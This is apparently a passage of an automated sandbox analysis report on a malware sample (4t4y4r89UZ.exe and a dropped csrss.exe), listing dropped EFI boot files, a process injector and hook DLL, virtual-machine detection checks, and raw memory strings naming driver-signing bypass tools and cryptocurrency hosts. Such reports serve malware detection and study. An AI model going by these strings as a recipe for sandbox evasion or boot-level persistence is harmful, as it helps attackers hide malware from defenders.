            Source: 4t4y4r89UZ.exe, 0000000A.00000002.327530754.00000000160B4000.00000004.00000001.sdmpBinary or memory string: VMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEDLLHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXEWMIPRVSE.EXEWMIPRVSE.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEWMIPRVSE.EXEWMIPRVSE.EXEVMSRVC.EXEVMUSRVC.EXEWMIPRVSE.EXEWMIPRVSE.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXE@
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\rss\csrss.exeDropped PE file which has not been started: B:\EFI\Boot\old.efi (copy)Jump to dropped file
            Source: C:\Windows\rss\csrss.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exeJump to dropped file
            Source: C:\Windows\rss\csrss.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dllJump to dropped file
            Source: C:\Windows\rss\csrss.exeDropped PE file which has not been started: C:\EFI\Boot\EfiGuardDxe.efiJump to dropped file
            Source: C:\Windows\rss\csrss.exeDropped PE file which has not been started: C:\EFI\Boot\bootx64.efiJump to dropped file
            Source: C:\Windows\rss\csrss.exeDropped PE file which has not been started: C:\Windows\windefender.exeJump to dropped file
            Source: C:\Windows\rss\csrss.exeDropped PE file which has not been started: C:\EFI\Microsoft\Boot\bootmgfw.efiJump to dropped file
            Source: C:\Windows\rss\csrss.exeDropped PE file which has not been started: B:\EFI\Microsoft\Boot\fw.efi (copy)Jump to dropped file
            Source: C:\Windows\rss\csrss.exeRegistry key enumerated: More than 173 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
            Source: C:\Users\user\Desktop\4t4y4r89UZ.exeFile opened / queried: VBoxGuestJump to behavior
            Source: C:\Users\user\Desktop\4t4y4r89UZ.exeFile opened / queried: vmciJump to behavior
            Source: C:\Users\user\Desktop\4t4y4r89UZ.exeFile opened / queried: HGFSJump to behavior
            Source: C:\Users\user\Desktop\4t4y4r89UZ.exeFile opened / queried: VBoxTrayIPCJump to behavior
            Source: C:\Users\user\Desktop\4t4y4r89UZ.exeFile opened / queried: \pipe\VBoxTrayIPCJump to behavior
            Source: C:\Users\user\Desktop\4t4y4r89UZ.exeFile opened / queried: VBoxMiniRdrDNJump to behavior
            Source: C:\Users\user\Desktop\4t4y4r89UZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
            Source: C:\Users\user\Desktop\4t4y4r89UZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
            Source: C:\Users\user\Desktop\4t4y4r89UZ.exeProcess information queried: ProcessInformationJump to behavior
            Source: csrss.exeBinary or memory string: derivedexpiresfallingfeatherfireflyfloat32float64gctraceglitterhttp://id is 0invalidkdu.exelookup max-agemorningnil keynop -> number panic: patientrefererrefreshrunningserial:server=signal silencesvc_versyscallthundertraileruintptrunknownupgradeversionvmmousev
            Source: 4t4y4r89UZ.exe, 0000000A.00000002.327007315.000000001600E000.00000004.00000001.sdmpBinary or memory string: vmsrvc.exevmusrvc.exesmss.exevmsrvc.exevmusrvc.execsrss.exevmsrvc.exevmusrvc.exewininit.exevmsrvc.exevmusrvc.execsrss.exevmsrvc.exevmusrvc.exewinlogon.exevmsrvc.exevmusrvc.exeservices.exevmsrvc.exevmusrvc.exelsass.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exedwm.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exePath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\WindowsApps
            Source: csrss.exeBinary or memory string: ayGOAWAYGOROOTGetACPGothicHangulHatranHebrewHyphenKaithiKhojkiLepchaLockedLycianLydianMondayPADDEDPcaSvcPragmaProgidRejangSCHED STREETServerStringSundaySyriacTai_LeTangutTeluguThaanaTypeMXTypeNSUTC+12UTC+13UTC-02UTC-08UTC-09UTC-11VBoxSFVT(%d)WINDIRWinMonWinmon
            Source: 4t4y4r89UZ.exe, 0000000A.00000002.327647157.00000000160E2000.00000004.00000001.sdmpBinary or memory string: vmusrvc.exe
            Source: csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmpBinary or memory string: too many linkstoo many usersunexpected EOFunknown code: unknown error unknown markerunknown methodunknown mode: unreachable: unsafe.Pointervirtualbox: %wvmwaretray.exevmwareuser.exewii libnup/1.0winapi error #work.full != 0x509ignoreCN=1xenservice.exezero parameter with GC prog
            Source: csrss.exeBinary or memory string: too many linkstoo many usersunexpected EOFunknown code: unknown error unknown markerunknown methodunknown mode: unreachable: unsafe.Pointervirtualbox: %wvmwaretray.exevmwareuser.exewii libnup/1.0winapi error #work.full != 0x509ignoreCN=1xenservice.exezero par
            Source: 4t4y4r89UZ.exe, 0000000A.00000002.327007315.000000001600E000.00000004.00000001.sdmpBinary or memory string: svchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exespoolsv.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesihost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exectfmon.exevboxtray.exevboxservice.exeexplorer.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exedllhost.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exeSearchUI.exesearchui.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exelsass.exesvchost.exesvchost.exesvchost.exesvchost.exedwm.exe$
            Source: 4t4y4r89UZ.exe, 0000000A.00000002.327007315.000000001600E000.00000004.00000001.sdmpBinary or memory string: svchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exevmmouse$
            Source: 4t4y4r89UZ.exe, 0000000A.00000002.327530754.00000000160B4000.00000004.00000001.sdmpBinary or memory string: qemuvirtual
            Source: csrss.exeBinary or memory string: ionPalmyreneParseUintPatchTimePublisherReleaseDCRemoveAllSamaritanSee OtherSeptemberSundaneseSysnativeToo EarlyTrailer: TypeCNAMETypeHINFOTypeMINFOUse ProxyVBoxGuestVBoxMouseWSASendToWednesdayWindows 7WriteFileZ07:00:00[%v = %d][:^word:][:alnum:][:alpha:][:asc
            Source: csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmpBinary or memory string: is unavailable()<>@,;:\"/[]?=0601021504Z0700476837158203125: cannot parse :ValidateLabels; SameSite=None<invalid Value>ASCII_Hex_DigitAccept-EncodingAccept-LanguageAddDllDirectoryBelowExactAboveCLSIDFromProgIDCLSIDFromStringCreateHardLinkWCreateWindowExWDefaultInstanceDelegateExecuteDeviceIoControlDuplicateHandleEfiGuardDxe.efiElectrumX 1.2.1Failed to find Failed to load FindNextVolumeWFindVolumeCloseFlushViewOfFileGateway TimeoutGetActiveObjectGetAdaptersInfoGetCommTimeoutsGetCommandLineWGetFirmwareTypeGetProcessTimesGetSecurityInfoGetStartupInfoWGlobal\qtxp9g8wHanifi_RohingyaIdempotency-KeyImpersonateSelfInstall failureIsWow64Process2Length RequiredLoadLibraryExALoadLibraryExWNonTransitionalNot ImplementedNtSuspendThreadOpenThreadTokenOther_LowercaseOther_UppercasePartial ContentProcess32FirstWPsalter_PahlaviQueryDosDeviceWRegCreateKeyExWRegDeleteValueWRequest TimeoutRtlDefaultNpAclSafeArrayCreateSafeArrayGetDimSafeArrayGetIIDSafeArrayUnlockSetCommTimeoutsSetSecurityInfoSetVolumeLabelWShellExecuteExWStringFromCLSIDStringFromGUID2TerminateThreadUninstallStringUnmapViewOfFileVBoxService.exeVPS.hsmiths.comWinsta0\DefaultX-Forwarded-For\\.\VBoxTrayIPC]
            Source: 4t4y4r89UZ.exe, 0000000A.00000002.327647157.00000000160E2000.00000004.00000001.sdmpBinary or memory string: vmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.execonhost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exeUsoClient.exeusoclient.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exedllhost.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesgrmbroker.exevmsrvc.exevmusrvc.exesvchost.exesvchost.exespoolsv.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesihost.exesvchost.exesvchost.exesvchost.exectfmon.exeexplorer.exesvchost.exedllhost.exeSearchUI.exesearchui.exesvchost.exeHxTsr.exehxtsr.exe
            Source: csrss.exeBinary or memory string: rinvalid locationloopbackmac_addrmountainmountvolmsvmmoufnamelessno anodeno-cacheno_proxyopPseudopolishedraw-readreadfromrecvfromrestlessrunnableruntime.scavengeshutdownsolitarystrconv.taskkilltwilightunixgramunknown(usernamevmmemctlvmx_svgawitheredwsaioctlwua
            Source: 4t4y4r89UZ.exe, 0000000A.00000002.327530754.00000000160B4000.00000004.00000001.sdmpBinary or memory string: smss.execsrss.exewininit.execsrss.exewinlogon.exeservices.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exespoolsv.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesihost.exesvchost.exesvchost.exesvchost.exectfmon.exeexplorer.exesvchost.exedllhost.exeSearchUI.exesearchui.exesvchost.exeHxTsr.exehxtsr.exedllhost.exesvchost.exeWmiPrvSE.exewmiprvse.exeWmiPrvSE.exewmiprvse.exeWmiPrvSE.exewmiprvse.exesvchost.exesvchost.exesvchost.execonhost.exesvchost.exeUsoClient.exeusoclient.exesvchost.exedllhost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesgrmbroker.exesvchost.exe4t4y4r89uz.exevmci$
            Source: 4t4y4r89UZ.exe, 0000000A.00000002.327530754.00000000160B4000.00000004.00000001.sdmpBinary or memory string: GPU3LFU_3R1CloseHandleS-1-5-18nehalemkvmqemuvirtualpersoconProcess32FirstW[system process]vboxtray.exevboxservice.exeProcess32NextWSystemsystemvboxtray.exevboxservice.exeRegistryregistry
            Source: csrss.exeBinary or memory string: T_STREAMResetEventSHA256-RSASHA384-RSASHA512-RSASYSTEMROOTSaurashtraSecureBootSet-CookieUser-AgentVMSrvc.exeVT_ILLEGALWSACleanupWSASocketWWSAStartupWget/1.9.1Windows 10[:^alnum:][:^alpha:][:^ascii:][:^blank:][:^cntrl:][:^digit:][:^graph:][:^lower:][:^print:][:
            Source: csrss.exeBinary or memory string: minal_PunctuationTurkey Standard TimeUnprocessable EntityWinmonProcessMonitor[invalid char class]\\.\pipe\VBoxTrayIPCasn1: syntax error: bad defer size classbad font file formatbad system page sizebad use of bucket.bpbad use of bucket.mpchan send (nil chan)clo
            Source: csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmpBinary or memory string: Value is nullVirtualUnlockWINDOW_UPDATEWTSFreeMemoryWriteConsoleW[FrameHeader \\.\VBoxGuestaccept-rangesaccess deniedadvapi32.dll
            Source: csrss.exeBinary or memory string: licesmallsmokesnowysockssoundsse41sse42ssse3stilltext/tls13tls: totaluint8usageuser=utf-8valuevmusbvmx86voicewaterwhitewispywriteyoung (MB) Value addr= base code= ctxt: curg= goid jobs= list= m->p= next= p->m= prev= span=%s: %s(...) , not , val -BEFV--DYOR-
            Source: csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmpBinary or memory string: ... omitting accept-charsetafter EfiGuardallocfreetracebad RST markerbad allocCountbad record MACbad span statebad stack sizebtc.usebsv.comcert installedchecksum errorcontent-lengthcouldn't patchdata truncateddistributor_iddriver removedexit status -1file too largefinalizer waitgcstoptheworldgetprotobynamegot system PIDinitial serverinternal errorinvalid syntaxis a directorykey size wronglevel 2 haltedlevel 3 haltedlookup TXT: %wmemprofilerateneed more datanil elem type!no module datano such deviceparse cert: %wprotocol errorread certs: %wreport_id is 0runtime: base=runtime: full=s.allocCount= semaRoot queueserver.versionstack overflowstopm spinningstore64 failedsync.Cond.Waittext file busytimeEndPeriodtoo many linkstoo many usersunexpected EOFunknown code: unknown error unknown markerunknown methodunknown mode: unreachable: unsafe.Pointervirtualbox: %wvmwaretray.exevmwareuser.exewii libnup/1.0winapi error #work.full != 0x509ignoreCN=1xenservice.exezero parameter with GC prog
            Source: csrss.exe, 00000032.00000002.400160271.0000000005200000.00000040.00000001.sdmpBinary or memory string: 11VBoxSFVT(%d)WINDIRWib
            Source: 4t4y4r89UZ.exe, 0000000A.00000002.327530754.00000000160B4000.00000004.00000001.sdmpBinary or memory string: systemvboxtray.exe
            Source: csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmpBinary or memory string: H_T= H_a= H_g= MB, W_a= and h_a= h_g= h_t= max= ptr siz= tab= top= u_a= u_g=%s %q%s*%d%s/%s%s:%d%s=%s%v-%v&#34;&#39;&amp;+0330+0430+0530+0545+0630+0845+1030+1245+1345, ..., fp:-0930.html.jpeg.wasm.webp156253.2.2500015000250003500045000550006560015600278125:***@:path<nil>AdlamAprilAttr(BamumBatakBuhidCall CountDograECDSAErrorFlagsFoundGetDCGreekHTTP/KhmerLatinLimbuLocalLstatMarchNushuOghamOriyaOsageP-224P-256P-384P-521PGDSERangeRealmRunicSTermTakriTamilTypeAUUID=\u202allowarraybad nblackbrookchdirclosecloudcsrssdreamemptyfalsefaultfieldfloatfrostgcinggladegrassgreenhttpsimap2imap3imapsint16int32int64matchmistymkdirmonthmuddynightntohspanicpaperparsepgdsepop3sproudquietrangeriverrmdirroughrouterune sdsetshapesleepslicesmallsmokesnowysockssoundsse41sse42ssse3stilltext/tls13tls: totaluint8usageuser=utf-8valuevmusbvmx86voicewaterwhitewispywriteyoung (MB)
            Source: csrss.exeBinary or memory string: verenamerun-v3rune1 sc.binscvg: secondsecureselectsendtoservershadowsilentsocketsocks socks5springstatusstringstructsummersunsetsweep telnetuint16uint32uint64unusedvioletvmhgfsvmxnetvpc-s3winterwup_hsxennetxensvcxenvdb %v=%v, (conn) (scan (scan) MB in Value>
            Source: csrss.exeBinary or memory string: nInUseno resultsnot a boolnot signedowner diedprl_cc.exeres binderres masterresumptionrune <nil>runtime: gschedtracesemacquireset-cookiesetsockoptsocks bindterminatedtracefree(tracegc() unixpacketunknown pcuser-agentuser32.dllvmusbmousevmware: %wwildflowerws2_
            Source: csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmpBinary or memory string: acceptactiveautumnbitterbreezebrokenchan<-cherryclosedcookiedivinedomaindwarf.efenceempty exec: expectfloralflowerforestfrostygopherhangupheaderhiddenip+netkilledlistenlittlelivelymeadowminutenumberobjectpopcntpurplereadatreasonremoverenamerun-v3rune1 sc.binscvg: secondsecureselectsendtoservershadowsilentsocketsocks socks5springstatusstringstructsummersunsetsweep telnetuint16uint32uint64unusedvioletvmhgfsvmxnetvpc-s3winterwup_hsxennetxensvcxenvdb %v=%v, (conn) (scan (scan) MB in Value> dying= flags= len=%d locks= m->g0= nmsys= s=nil
            Source: csrss.exeBinary or memory string: rayUnlockSetCommTimeoutsSetSecurityInfoSetVolumeLabelWShellExecuteExWStringFromCLSIDStringFromGUID2TerminateThreadUninstallStringUnmapViewOfFileVBoxService.exeVPS.hsmiths.comWinsta0\DefaultX-Forwarded-For\\.\VBoxTrayIPC] morebuf={pc:accept-encodingaccept-lang
            Source: csrss.exeBinary or memory string: main.isRunningInsideVMWare
            Source: csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmpBinary or memory string: entersyscallexit status found av: %sgcpacertracegetaddrinfowgot TI tokenguid_machinehost is downhttp2debug=1http2debug=2illegal seekinjector.exeinstall_dateinvalid baseinvalid portinvalid slotiphlpapi.dllkernel32.dllmachine_guidmadvdontneedmax-forwardsnetapi32.dllno such hostnon-existentnot pollableoleaut32.dllout of rangeparse PE: %wpointtopointproxyconnectreflect.Copyreleasep: m=remote errorruntime: f= runtime: gp=s ap traffics hs trafficshort buffersignature.%stransmitfileulrichard.chunexpected )unknown portunknown typevmacthlp.exevmtoolsd.exewatchdog.exewinlogon.exewintrust.dllwirep: p->m=wtsapi32.dll != sweepgen (default %q) (default %v) MB released
            Source: csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmpBinary or memory string: IP addressIsValidSidKeep-AliveKharoshthiLocalAllocLockFileExLogonUserWManichaeanMessage-IdNo ContentOld_ItalicOld_PermicOld_TurkicOpenEventWOpenMutexWOpenThreadOther_MathPOSTALCODEParseFloatPhoenicianProcessingPulseEventRST_STREAMResetEventSHA256-RSASHA384-RSASHA512-RSASYSTEMROOTSaurashtraSecureBootSet-CookieUser-AgentVMSrvc.exeVT_ILLEGALWSACleanupWSASocketWWSAStartupWget/1.9.1Windows 10[:^alnum:][:^alpha:][:^ascii:][:^blank:][:^cntrl:][:^digit:][:^graph:][:^lower:][:^print:][:^punct:][:^space:][:^upper:][:xdigit:]\\.\WinMon\patch.exe^{[\w-]+}$app_%d.txtatomicand8casgstatuscmd is nilcomplex128connectiondnsapi.dlldsefix.exedwarf.Attre.keff.orgexitThreadexp mastergetsockoptgoroutine http_proxyimage/jpegimage/webpinvalidptrkeep-alivemSpanInUseno resultsnot a boolnot signedowner diedprl_cc.exeres binderres masterresumptionrune <nil>runtime: gschedtracesemacquireset-cookiesetsockoptsocks bindterminatedtracefree(tracegc()
            Source: csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmpBinary or memory string: RTP.exeSYSTEMROOT=SetFileTimeSignWritingSoft_DottedSystemDriveTESTING KEYTTL expiredVBoxServiceVMUSrvc.exeVT_RESERVEDVariantInitVirtualFreeVirtualLockWSARecvFromWarang_CitiWhite_SpaceWinDefender[:^xdigit:]\dsefix.exealarm clockapplicationbad addressbad messagebad timedivbitcoins.skbroken pipecampaign_idcgocall nilclobberfreeclosesocketcombase.dllcompaign_idcreated by crypt32.dlldnsmessage.e2.keff.orgembedded/%sfile existsfinal tokenfloat32nan2float64nan2float64nan3gccheckmarkgeneralizedget CDN: %wgetpeernamegetsocknamehttps_proxyi/o timeoutlocal errorlost mcachemSpanManualmethodargs(mswsock.dllnext servernil contextorannis.comparse errorprocess: %sraw-controlreflect.Setretry-afterruntime: P runtime: p scheddetailsechost.dllsecur32.dllservice: %sshell32.dllshort writetaskmgr.exetls: alert(tracealloc(traffic updunreachableuserenv.dllversion=183wininet.dllwup_process (sensitive) [recovered] allocCount found at *( gcscandone m->gsignal= minTrigger= nDataRoots= nSpanRoots= pages/byte
            Source: csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmpBinary or memory string: VersionVirtualWSARecvWSASend"%s" %stypes value=abortedalt -> ancientany -> booleancharsetchunkedcmd.execonnectconsolecpu: %scrimsonderivedexpiresfallingfeatherfireflyfloat32float64gctraceglitterhttp://id is 0invalidkdu.exelookup max-agemorningnil keynop -> number panic: patientrefererrefreshrunningserial:server=signal silencesvc_versyscallthundertraileruintptrunknownupgradeversionvmmousevpcuhubwaitingwsarecvwsasendwup_verxen: %wxennet6 data=%q etypes goal
            Source: 4t4y4r89UZ.exe, 0000000A.00000002.327647157.00000000160E2000.00000004.00000001.sdmpBinary or memory string: vmsrvc.exe
            Source: 4t4y4r89UZ.exe, 0000000A.00000002.327647157.00000000160E2000.00000004.00000001.sdmpBinary or memory string: xennetxennet6XA
            Source: csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmpBinary or memory string: Value is nullVirtualUnlockWINDOW_UPDATEWTSFreeMemoryWriteConsoleW[FrameHeader \\.\VBoxGuestaccept-rangesaccess deniedadvapi32.dllauthorizationbad flushGen bad map statebtc.cihar.combtc.xskyx.netcache-controlcontent-rangecouldn't polldalTLDpSugct?data is emptyemail addressempty integerexchange fullfatal error: gethostbynamegetservbynamegzip, deflatehttp2client=0if-none-matchimage/svg+xmlinvalid UTF-8invalid base kernel32.dllkey expansionlast-modifiedlevel 3 resetload64 failedlogs endpointmaster secretname is emptynil stackbasenot a Float32open file: %wout of memoryparallels: %wparse URL: %wparsing time powrprof.dllprl_tools.exerebooting nowscvg: inuse: servers countservice statesigner is nilsocks connectsrmount errorstill in listtimer expiredtrailing datatriggerRatio=unimplementedunsupported: user canceledvalue method verifier hashverifier hostvirtualpc: %wxadd64 failedxchg64 failed}
            Source: 4t4y4r89UZ.exe, 0000000A.00000002.327007315.000000001600E000.00000004.00000001.sdmpBinary or memory string: vboxservice.exe
            Source: csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmpBinary or memory string: (MISSING)(unknown)+infinity, newval=, oldval=-07:00:00-infinity/api/cdn?/api/poll244140625: status=; Domain=Accuracy(AuthorityBassa_VahBhaiksukiClassINETCuneiformDiacriticExecQueryFindCloseForbiddenGetDIBitsHex_DigitInheritedInstMatchInstRune1InterfaceKhudawadiLocalFreeMalayalamMongolianMoveFileWNabataeanNot FoundOP_RETURNOSCaptionPalmyreneParseUintPatchTimePublisherReleaseDCRemoveAllSamaritanSee OtherSeptemberSundaneseSysnativeToo EarlyTrailer: TypeCNAMETypeHINFOTypeMINFOUse ProxyVBoxGuestVBoxMouseWSASendToWednesdayWindows 7WriteFileZ07:00:00[%v = %d][:^word:][:alnum:][:alpha:][:ascii:][:blank:][:cntrl:][:digit:][:graph:][:lower:][:print:][:punct:][:space:][:upper:]atomicor8b.ooze.ccbad indirbillowingbroadcastbus errorbutterflychallengechan sendcomplex64connectexcopystackcsrss.exectxt != 0d.nx != 0ecdsa.netempty urlfn.48.orgfodhelperfork/execfuncargs(gdi32.dllimage/gifimage/pnginterfaceinterruptipv6-icmplingeringlocalhostmSpanDeadmSpanFreemulticastnew tokennil errorntdll.dllole32.dllomitemptypanicwaitpatch.exepclmulqdqprecisionprintableprotocol psapi.dllraw-writereboot inrecover: reflect: resonancerwxrwxrwxscheduledsnowflakesparklingsucceededtask %+v
            Source: csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmpBinary or memory string: throbbingunderflowunhandledw3m/0.5.1wanderingwaterfallweatheredwebsocketxenevtchn} stack=[ MB goal, actual
            Source: 4t4y4r89UZ.exe, 0000000A.00000002.327007315.000000001600E000.00000004.00000001.sdmpBinary or memory string: vboxtray.exe
            Source: csrss.exeBinary or memory string: tUsage of %s: Value is nullVirtualUnlockWINDOW_UPDATEWTSFreeMemoryWriteConsoleW[FrameHeader \\.\VBoxGuestaccept-rangesaccess deniedadvapi32.dll
            Source: 4t4y4r89UZ.exe, 0000000A.00000002.327530754.00000000160B4000.00000004.00000001.sdmpBinary or memory string: vboxtray.exevboxservice.exesmss.exevboxtray.exevboxservice.execsrss.exevboxtray.exevboxservice.exewininit.exevboxtray.exevboxservice.execsrss.exevboxtray.exevboxservice.exewinlogon.exevboxtray.exevboxservice.exeservices.exevboxtray.exevboxservice.exelsass.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exedwm.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exeHxTsr.exehxtsr.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exedllhost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exeWmiPrvSE.exewmiprvse.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exeWmiPrvSE.exewmiprvse.exevboxtray.exevboxservice.exeWmiPrvSE.exewmiprvse.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exevboxtray.exevboxservice.execonhost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exeUsoClient.exeusoclient.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exedllhost.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesv
